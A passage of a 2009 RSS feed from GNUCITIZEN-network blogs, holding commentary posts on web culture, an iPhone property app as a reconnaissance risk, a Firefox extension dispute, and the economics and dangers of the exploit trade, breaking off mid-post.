href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Why Tribes, Not Money or Factories, Will Change the World</title>
         <link>http://www.hakiri.org/blog/why-tribes-not-money-or-factories-will-change-the-world/</link>
         <description>Seth Godin argues the Internet has ended mass marketing and revived a human social unit from the distant past: tribes. Founded on shared ideas and values, tribes give ordinary people the power to lead and make big change. He urges us to do so. If you watch the video you will spot the Kindle sell-out but it is interesting presentation nevertheless. [...]</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=585</guid>
         <pubDate>Mon, 11 May 2009 10:59:37 -0700</pubDate>
         <content:encoded><![CDATA[<p>Seth Godin argues the Internet has ended mass marketing and revived a human social unit from the distant past: tribes. Founded on shared ideas and values, tribes give ordinary people the power to lead and make big change. He urges us to do so.</p> <div class="screen"> <iframe class="embeddedvideo" src="http://video.ted.com/assets/player/swf/EmbedPlayer.swf" type="application/x-shockwave-flash" width="446" height="326"></iframe></div> <p>If you watch the video you will spot the Kindle sell-out but it is interesting presentation nevertheless. Actually, I listened to (yes audio version) of Seth&#8217;s book called <q>Tribes</q> and I found the whole idea quite fascinating but a bit off the ground.</p> <p><em>See the video. You might get inspired to start your own tribe.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Breaking Into a Home With an iPhone</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/0BDN8BPqizg/</link>
         <description>This is going to be one of these quick posts which just makes you think what the information security landscape will be like in 5 years. Before I move on with my commentary, here is a video which is essential for you to watch. Got the idea? No! Let me explain. What you see in the video above is an application for the iPhone which gives you detailed characteristics of properties (houses) in USA. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=3211</guid>
         <pubDate>Mon, 11 May 2009 04:27:16 -0700</pubDate>
         <content:encoded><![CDATA[<p>This is going to be one of these quick posts which just makes you think what the information security landscape will be like in 5 years. Before I move on with my commentary, here is a video which is essential for you to watch.</p> <div class="screen"><iframe class="embeddedvideo" src="http://www.youtube.com/v/rJfrdcbfXsc&#038;hl=en&#038;fs=1" type="application/x-shockwave-flash" width="560" height="340"></iframe></div> <p>Got the idea? No! Let me explain. What you see in the video above is an application for the iPhone which gives you detailed characteristics of properties (houses) in USA. You can either search the map or just use your GPS coordinates to get information such as price of the house, number of floors, number of rooms, pictures taken from inside the house if the house was part of any register (letting agencies etc.) before you moved in, and other interesting information.</p> <p>This is the kind of information gathering you see only in the movies. I won&#8217;t be surprised if future versions of these kind of applications can pool even essential blueprints which show not only how the house was constructed from architectural point of view but also show the power and gas grids and perhaps even any other wiring such as telephone, coaxial, etc.</p> <p>All of this information is also available through easily accessible APIs. Perhaps these APIs are not publicly known but anyone who can run a sniffer most certainly can get hold of the URLs and their formats. Now mash this APIs with any other tool such as one that correlates IP address to physical location (not very accurate btw) or better yet a wardriving tool and you have a infowar machine in your pocket that will make any criminal organization proud of.</p> <p>This is the main purpose of my <a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/for-my-next-trick-hacking-web20/">Web2.0 talk/research</a> from two years ago. Back then I made a very simple analogy which I would like to bring once again. When the email was invented nobody even suspected that it will be used for things such as spam and malware. That was something unimaginable. Today spam is the fastest growing criminal industry and malware delivered over email is the most successful one. In summary, we cannot foresee how a technology will be used/abused. That depends on the imagination of the people.</p> <p>The same goes for the Web2.0 meme. The more we use it, the more ways we will find to abuse it. However it is also important to say that the more we use it the more accustomed we will become to it. Therefore, when the shit hits the fan there will be very little that we can do.</p> <p><em>The reason I am bringing this up is not because I would like to start even more FUD around the Web2.0 mem but it is time for security aware people to stop looking into the technical aspects and start thinking in terms of technologies that affect normal people. Sometimes, we just lack the realism and we fail to spot the obvious problems.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/0BDN8BPqizg" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>The Reason to Focus on Simplicity</title>
         <link>http://www.hakiri.org/blog/the-reason-to-focus-on-simplicity/</link>
         <description>I wrote about the importance of simplicity before but here is another reason why you should believe me. :) Keep this in mind the next time you design a service or a product. [...]</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=568</guid>
         <pubDate>Sun, 10 May 2009 07:38:49 -0700</pubDate>
         <content:encoded><![CDATA[<p>I wrote about the importance of simplicity before but here is another reason why you should believe me. :)</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.hakiri.org/static/blog/2009/05/simplicity01.png"><img src="http://www.hakiri.org/static/blog/2009/05/simplicity01-300x171.png" alt="Simplicity01" title="Simplicity01" width="300" height="171" class="alignnone size-medium wp-image-572"/></a> <a rel="nofollow" target="_blank" href="http://www.hakiri.org/static/blog/2009/05/simplicity02.png"><img src="http://www.hakiri.org/static/blog/2009/05/simplicity02-300x171.png" alt="Simplicity02" title="Simplicity02" width="300" height="171" class="alignnone size-medium wp-image-572"/></a> <a rel="nofollow" target="_blank" href="http://www.hakiri.org/static/blog/2009/05/simplicity03.png"><img src="http://www.hakiri.org/static/blog/2009/05/simplicity03-300x171.png" alt="Simplicity03" title="Simplicity03" width="300" height="171" class="alignnone size-medium wp-image-572"/></a></div> <p><em>Keep this in mind the next time you design a service or a product. The simpler the better.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Social Media in Plain English</title>
         <link>http://www.hakiri.org/blog/social-media-in-plain-english/</link>
         <description>Confused information security folks (but not only) can find this video quite interesting. What I liked the most about this video is that the authors clearly explain that social media is first of all the collective contributions of ordinary people through blogs, wikies, podcasts and other social instruments combined with the efforts of other individuals and organizations who are willing to aggregate, organize and help facilitate community feedback. [...]</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=563</guid>
         <pubDate>Sun, 10 May 2009 07:17:41 -0700</pubDate>
         <content:encoded><![CDATA[<p>Confused information security folks (but not only) can find this video quite interesting.</p> <div class="screen"><iframe class="embeddedvideo" src="http://www.youtube.com/v/MpIOClX1jPE&#038;color1=0xb1b1b1&#038;color2=0xcfcfcf&#038;hl=en&#038;feature=player_embedded&#038;fs=1" type="application/x-shockwave-flash" width="425" height="344"></iframe></div> <p>What I liked the most about this video is that the authors clearly explain that social media is first of all the collective contributions of ordinary people through blogs, wikies, podcasts and other social instruments combined with the efforts of other individuals and organizations who are willing to aggregate, organize and help facilitate community feedback.</p> <p><em>By the people, for the people!</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Bill Gates Facebook Page</title>
         <link>http://www.hakiri.org/blog/bill-gates-facebook-page/</link>
         <description>Funny Sunday morning stuff: Steve Jobs and St. Peter are also there.---gnucitizen information security gigs part of the cutting-edge network:No active items found!GNUCITIZEN Content Survey---recent posts from the gnucitizen cutting-edge network:Websecurify Security Scanner v0.1 Sneak PeekCVE-2009-1151: phpMyAdmin Remote Code Execution Proof of ConceptNext StageHacking Linksys IP Cameras (pt 5)Simple and Obvious</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=554</guid>
         <pubDate>Sun, 10 May 2009 02:11:40 -0700</pubDate>
         <content:encoded><![CDATA[<p>Funny Sunday morning stuff:</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.hakiri.org/static/blog/2009/05/bill-gates-facebook.jpg"><img src="http://www.hakiri.org/static/blog/2009/05/bill-gates-facebook.jpg" alt="Bill Gates Facebook JPG" title="Bill Gates Facebook JPG" width="520" height="1066" class="alignnone size-full wp-image-555"/></a></div> <p><em>Steve Jobs and St. Peter are also there.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Did You Know 3.0</title>
         <link>http://www.hakiri.org/blog/did-you-know-30/</link>
         <description>In my opinion, some of the facts presented in this video are questionable. There isn&amp;#8217;t an easy way to verify them. Nevertheless, the footage is quite interesting and informative. The reason why I am posting this is to stress that information has become an important part of our lives. Today we are information hungry. Tomorrow&amp;#8230; who knows? I suspect that we will get fed up with the world and escape for the simpler life. [...]</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=551</guid>
         <pubDate>Sun, 10 May 2009 01:52:33 -0700</pubDate>
         <content:encoded><![CDATA[<p>In my opinion, some of the facts presented in this video are questionable. There isn&#8217;t an easy way to verify them. Nevertheless, the footage is quite interesting and informative.</p> <div class="screen"><iframe class="embeddedvideo" src="http://www.youtube.com/v/jpEnFwiqdx8&#038;feature=player_embedded" type="application/x-shockwave-flash" width="425" height="350"></iframe></div> <blockquote>3.0 for 2008 &#8211; Newly Revised Edition Created by Karl Fisch, and modified by Scott McLeod; Globalization &amp; The Information Age. It was even adapted by Sony BMG at an executive meeting they held in Rome this year. Credits are also given to Scott McLeod, Jeff Brenman.</blockquote> <p><em>The reason why I am posting this is to stress that information has become an important part of our lives. Today we are information hungry. Tomorrow&#8230; who knows? I suspect that we will get fed up with the world and escape for the simpler life. You might want to check my <a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/information-overload/">previous article</a> on the same subject.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>The Revolution of the Internet in 1993</title>
         <link>http://www.hakiri.org/blog/the-revolution-of-the-internet-in-1993/</link>
         <description>A video from 1993 when the Internet was just making its premiere in the world. ---gnucitizen information security gigs part of the cutting-edge network:No active items found!GNUCITIZEN Content Survey---recent posts from the gnucitizen cutting-edge network:Websecurify Security Scanner v0.1 Sneak PeekCVE-2009-1151: phpMyAdmin Remote Code Execution Proof of ConceptNext StageHacking Linksys IP Cameras (pt 5)Simple and Obvious</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=548</guid>
         <pubDate>Sat, 09 May 2009 12:39:47 -0700</pubDate>
         <content:encoded><![CDATA[<p>A video from 1993 when the Internet was just making its premiere in the world.</p> <div class="screen"><iframe class="embeddedvideo" src="http://www.youtube.com/v/fxfhInhkvtM&#038;hl=en&#038;fs=1" type="application/x-shockwave-flash" width="425" height="344"></iframe></div><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Extensions at War</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/V3taPIIsstw/</link>
         <description>Two of the most popular Firefox extensions are at war, fighting for their own piece of land. More examples will follow. Oh yes, the digital battlefield is taking unusual shapes. The latest manifestation of cyber warfare is a conflict between the Adblock Plus and the NoScript extensions. The story goes that NoScript used some JavaScript tactics and, of course, some obfuscations in order to cripple the Adblock Plus functionalities. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=3171</guid>
         <pubDate>Sun, 03 May 2009 01:37:28 -0700</pubDate>
         <content:encoded><![CDATA[<p>Two of the most popular Firefox extensions are at war, fighting for their own piece of land. More examples will follow.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/32912172@N00/3119211301/"><img src="http://farm4.static.flickr.com/3213/3119211301_40cbd3815d.jpg?v=0" alt="War poster,1943"/></a></div> <p>Oh yes, the digital battlefield is taking unusual shapes. The latest manifestation of cyber warfare is a conflict between the Adblock Plus and the NoScript extensions. The <a rel="nofollow" target="_blank" href="http://adblockplus.org/blog/attention-noscript-users">story goes</a> that NoScript used some JavaScript tactics and, of course, some obfuscations in order to cripple the Adblock Plus functionalities. This attack was a response to Adblock Plus blocking NoScript ads which you see when you upgrade the extension, which as you know happens quite regularly, don&#8217;t know why.</p> <p>The conflict seems to be resolved now to one degree or another but it is interesting to observe the whole situation and also draw important conclusions. Therefore, I&#8217;ve got several points I would like to bring to the table:</p> <ol>
<li>More examples of similar nature will follow. Keep an eye on Facebook, Apple AppStore, Firefox and other platforms that allow 3rd-party components to be displayed, downloaded and executed.</li>
<li><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/firefox-malware/">As I mentioned before</a>, a malicious piece of JavaScript code (even an obvious obfuscation) can be quite easily smuggled into harmlessly looking Firefox extensions. If I may speculate, the situation is the same for other similar platforms.</li>
<li>Unless platform vendors do something about it, they could become the next hot spot for all sorts of interesting malware.</li>
</ol> <p><em>It is also very interesting to see the extend to which extension developers will go in order to protect their userbase. After all, larger userbase equals more money. And with <a rel="nofollow" target="_blank" href="http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/">more people looking to quickly cache in</a>, the battlefield is truly changing for better or worse.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/V3taPIIsstw" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>Blogs, Groups and Forums</title>
         <link>http://houseofhackers.org/2009/05/02/blogs-groups-and-forums/</link>
         <description>Unlike the old platform, the new platform will provide much more purpose. It is yet to be decided how all of the feature will work but it is very likely that we will drop the support for forums and emphasize the groups feature and more specifically the group wire where members of individual groups can [...]</description>
         <guid isPermaLink="false">http://houseofhackers.org/?p=5</guid>
         <pubDate>Sat, 02 May 2009 04:10:15 -0700</pubDate>
         <content:encoded><![CDATA[<p>Unlike the old platform, the new platform will provide much more purpose. It is yet to be decided how all of the feature will work but it is very likely that we will drop the support for forums and emphasize the groups feature and more specifically the group wire where members of individual groups can communicate. Additionally, we are going to allow creation of more purposeful blogs where one or several members can communicate their ideas and get community and external feedback. It is yet all of this to be decided so please join us at <a rel="nofollow">hoh</a> discussion group.</p>]]></content:encoded>
      </item>
      <item>
         <title>Welcome to HoH v2</title>
         <link>http://houseofhackers.org/2009/05/01/welcome-to-hoh-v2/</link>
         <description>Hello House of Hackers V2. I like you!</description>
         <guid isPermaLink="false">http://houseofhackers.org/?p=3</guid>
         <pubDate>Fri, 01 May 2009 10:30:42 -0700</pubDate>
         <content:encoded><![CDATA[<p>Hello House of Hackers V2. I like you!</p>]]></content:encoded>
      </item>
      <item>
         <title>Exploit Sweatshop</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/rELeF2i51BY/</link>
         <description>When I was playing/introducing the partial disclosure practice an year and something ago, I did get contacted by numerous dodgy characters willing to buy yet undisclosed vulnerabilities for substantial amount of money. Of course, requests of that nature were kindly ignored. I couldn&amp;#8217;t believe that someone was willing to give me so much money for something I virtually spent 2-3 hours maximum to produce. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=3141</guid>
         <pubDate>Thu, 30 Apr 2009 05:04:47 -0700</pubDate>
         <content:encoded><![CDATA[<p>When I was playing/introducing the partial disclosure practice an year and something ago, I did get contacted by numerous dodgy characters willing to buy yet undisclosed vulnerabilities for substantial amount of money.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/28876688@N03/2696481749/"><img src="http://farm4.static.flickr.com/3288/2696481749_6b88654114.jpg?v=0" alt="Sweatshop project"/></a></div> <p>Of course, requests of that nature were kindly ignored. I couldn&#8217;t believe that someone was willing to give me so much money for something I virtually spent 2-3 hours maximum to produce.</p> <p>Later on, during the CONFidence 2008 event in Krakow I met a bunch of people who claimed that they already sell exploits to various UK companies and the figures that they were making were outstanding. To give you a clue, given the pound dollar difference at that time, you could have made 6 times more than what ZDI and other similar programs can offer you for a top range exploit. This is already better than a top salary in UK.</p> <p>Same year, different event&#8230; I saw an interesting presentation by Robert McArdle from Trend Micro. The presentation was titled <q>Fighting web Based, Profit-Driven Threats</q>. On one of his slides, Robert commented that <q>cybercrime is becoming more profitable than the drug cartels</q>. Perhaps you wont be able to make as much money from carding as you might expect but you can do quite well selling visualized stuff, such as exploits and exploit toolkits.</p> <p>Present times, DojoSec Monthly Briefings&#8230; Matthew Watchinski from Sourcefire VRT <a rel="nofollow" target="_blank" href="http://vimeo.com/4110571">talked</a> about a PDF 0day spreading around Xmas time. The exploit took a couple of good months for Adobe to fix it. The author sold it for 75K to a unknown 3rd-party in China according to Matthew. The vulnerability was also relatively easy to find and required very little experience to exploit.</p> <p>All of this leads to the very obvious conclusion which is that at present times cybercrime is a flourishing industry. Soon, there will be even more recruits coming to join the dark-side forces of the cybercrime cartels. They will do it for the money!</p> <div class="message"><q>No more free bugs</q> you say. I say that <strong>you</strong> are leading people to become the next generation of cyber menace. Perhaps you forgot that the information security community was built on and thrived because of a simple but fundamental principle: <q>knowledge must be free</q>.</div> <h3>Sell The Bugs</h3> <p>Regardless how good these figures may sound to you, you need to take a step back and think really well what you are getting into. Here are a few points that you need to consider before selling exploits:</p> <ul>
<li><strong>Cybercrime is not a joke</strong> &#8211; If you get caught selling exploits to a dodgy 3rd-party you may end up with a prison sentence longer than the sentence of a child molester. If you live in US or UK you could be charged and treated as a terrorist which will completely destroy not only your life but the life of your closes people.</li>
<li><strong>TAX man problems</strong> &#8211; Oh Yes! Unjustifiable incomes could get you in trouble with the TAX man. The TAX man will hunt you and hurt you.</li>
<li><strong>Broken legs and other broken parts of the body</strong> &#8211; You have no idea to whom you are selling to. Tomorrow you may wake up with broken legs and twice as poorer as the day before.</li>
<li><strong>Even worse</strong> &#8211; People will kill for a lot less than 75K. Keep that in mind.</li>
</ul> <p>In my humble opinion, exploit brokerage is a risky business. There is an unquantifiable risk associated with this practice and that is only due to the high price of exploits which are sold today.</p> <h3>Exploit Sweatshop</h3> <p>Nevertheless, it is just silly to believe that no one is producing and selling exploits in a large scale. Do you remember the numerous gaming sweatshops which sprung up like wild mushrooms after the recent heavy rains in 3rd-world countries? I recall seeing a documentary on a typical day in a Chinese WoW sweatshop. I remember I saw a room full of almost naked people, numerous PCs hooked up into a gigantic DIY network spreading across the entire floor. Most of the WoW accounts were fully automated, running from virtualized platforms.</p> <p>The aim was simple: <strong>a)</strong> develop many characters in a semi-automated fashion by killing small animals and other things around the WoW world and <strong>b)</strong> sell the characters plus other artifacts to western buyers for a substantial amount of money. All of this can be achieved for as little as $70 a month per person. This is a remarkable business model which works extremely well.</p> <p>Similarly, all you need is a bunch of programmers from India, China, or Eastern Europe to code up fuzzers and run them against as many software products as possible. At the end of the day buffer overflow exploits a relative easy to detect. All you need is a crash caused by putting far too many 0&#215;41 in a buffer. The crash is already an indication that something is wrong. It requires a bit of manual work to figure out whether the crash is exploitable. From personal experience, and by looking into the work of my peers, it takes approximately 10 days to develop a crash into an exploit. Most of the times, the exploitability factor of a crash is apparent and therefore no time needs to be wasted. Other times, a crash can be archived for future investigation when it could become exploitable given it meets the necessary conditions.</p> <p>Perhaps you can do all that by paying someone as little as $70 a month as it is the case with WoW sweatshops. That is 3 times less than what I am paying for just hosting. Therefore, I most certainly can afford to hire 3-4 people right now and even double their salaries, but let&#8217;s do the maths:</p> <pre><code># average exploit price: <strong>$5000</strong>
# number of people to hire: <strong>5</strong>
# average monthly salary: <strong>$100</strong>
# job specs: <strong>write fuzzers</strong> 5 * 100 = $500 # a month expenses
